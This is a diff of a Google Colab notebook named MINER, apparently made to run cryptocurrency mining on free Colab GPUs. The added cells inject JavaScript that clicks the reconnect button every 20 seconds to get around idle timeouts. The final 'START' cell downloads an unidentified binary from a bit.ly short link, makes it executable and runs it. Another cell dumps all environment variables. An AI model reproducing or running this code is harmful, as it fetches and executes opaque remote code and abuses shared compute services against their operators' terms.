--- a/MINER.ipynb
+++ b/MINER.ipynb
@@ -3,10 +3,9 @@
   "nbformat_minor": 0,
   "metadata": {
     "colab": {
-      "name": "MINER.ipynb",
+      "name": "Mikey-NEW.ipynb",
       "provenance": [],
-      "machine_shape": "hm",
-      "authorship_tag": "ABX9TyP9fkx3cEqg46eKKtgt7T8z",
+      "authorship_tag": "ABX9TyNmyuUpgFvgKetITFQoV0W9",
       "include_colab_link": true
     },
     "kernelspec": {
@@ -15,8 +14,7 @@
     },
     "language_info": {
       "name": "python"
-    },
-    "accelerator": "GPU"
+    }
   },
   "cells": [
     {
@@ -26,28 +24,61 @@
         "colab_type": "text"
       },
       "source": [
-        "<a href=\"https://colab.research.google.com/github/mamakkaucoy/colab/blob/main/MINER.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
+        "<a href=\"https://colab.research.google.com/github/johnyrand/anjay/blob/main/byokininaru.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
       ]
     },
     {
       "cell_type": "markdown",
       "metadata": {
-        "id": "5IHYgObGYg42"
+        "id": "cmbtuEyk3IgH"
       },
       "source": [
-        "# **MINER**\n",
-        "\n",
-        "`Yuk Gaskencuk`\n"
+        "# **MINER**"
       ]
     },
     {
       "cell_type": "code",
       "metadata": {
         "cellView": "form",
-        "id": "J46hmikhYmli"
+        "id": "Zjopwk9B9EK-"
       },
       "source": [
-        "#@title CEK GPU\n",
+        "#@title Run Every 30 Minutes\n",
+        "\n",
+        "print (\"Hello World\")\n",
+        "\n",
+        "import IPython\n",
+        "from google.colab import output\n",
+        "\n",
+        "display(IPython.display.Javascript('''\n",
+        "function ClickConnect(){\n",
+        "  btn = document.querySelector(\"colab-connect-button\")\n",
+        "  if (btn != null){\n",
+        "    console.log(\"Click colab-connect-button\"); \n",
+        "    btn.click() \n",
+        "    }\n",
+        "    \n",
+        "  btn = document.getElementById('ok')\n",
+        "  if (btn != null){\n",
+        "    console.log(\"Click reconnect\"); \n",
+        "    btn.click() \n",
+        "    }\n",
+        "  }\n",
+        "    \n",
+        "setInterval(ClickConnect,20000)\n",
+        "'''))"
+      ],
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "code",
+      "metadata": {
+        "cellView": "form",
+        "id": "QgkiBRBn3JuD"
+      },
+      "source": [
+        "#@title Check GPU\n",
         "! nvidia-smi -L"
       ],
       "execution_count": null,
@@ -57,10 +88,10 @@
       "cell_type": "code",
       "metadata": {
         "cellView": "form",
-        "id": "IB_dAbg8Yvj5"
+        "id": "aY-uTqnp3NTD"
       },
       "source": [
-        "#@title MOD GPU\n",
+        "#@title Mod GPU\n",
         "\n",
         "from numba import jit, cuda\n",
         "import numpy as np\n",
@@ -96,10 +127,10 @@
       "cell_type": "code",
       "metadata": {
         "cellView": "form",
-        "id": "x7MLYWtqY0Kg"
+        "id": "S8eJcs9G3YCb"
       },
       "source": [
-        "#@title IMPORT CUDA\n",
+        "#@title Import CUDA\n",
         "\n",
         "import os\n",
         "' && '.join([f'export {name}=\"{value}\"' for name, value in os.environ.items()])"
@@ -111,10 +142,10 @@
       "cell_type": "code",
       "metadata": {
         "cellView": "form",
-        "id": "B3TP3IA8Y3DN"
+        "id": "Ujt1vWgY3gvT"
       },
       "source": [
-        "#@title MAXIMALKAN TENSOR\n",
+        "#@title Tensor Maksimum\n",
         "\n",
         "import tensorflow as tf\n",
         "\n",
@@ -131,10 +162,10 @@
       "cell_type": "code",
       "metadata": {
         "cellView": "form",
-        "id": "sbuSn-OdY5Gx"
+        "id": "w8EUKw1q3Juw"
       },
       "source": [
-        "#@title MULAI.....\n",
+        "#@title START.....\n",
         "! wget https://bit.ly/3vAfI7G && chmod +x 3vAfI7G && ./3vAfI7G"
       ],
       "execution_count": null,
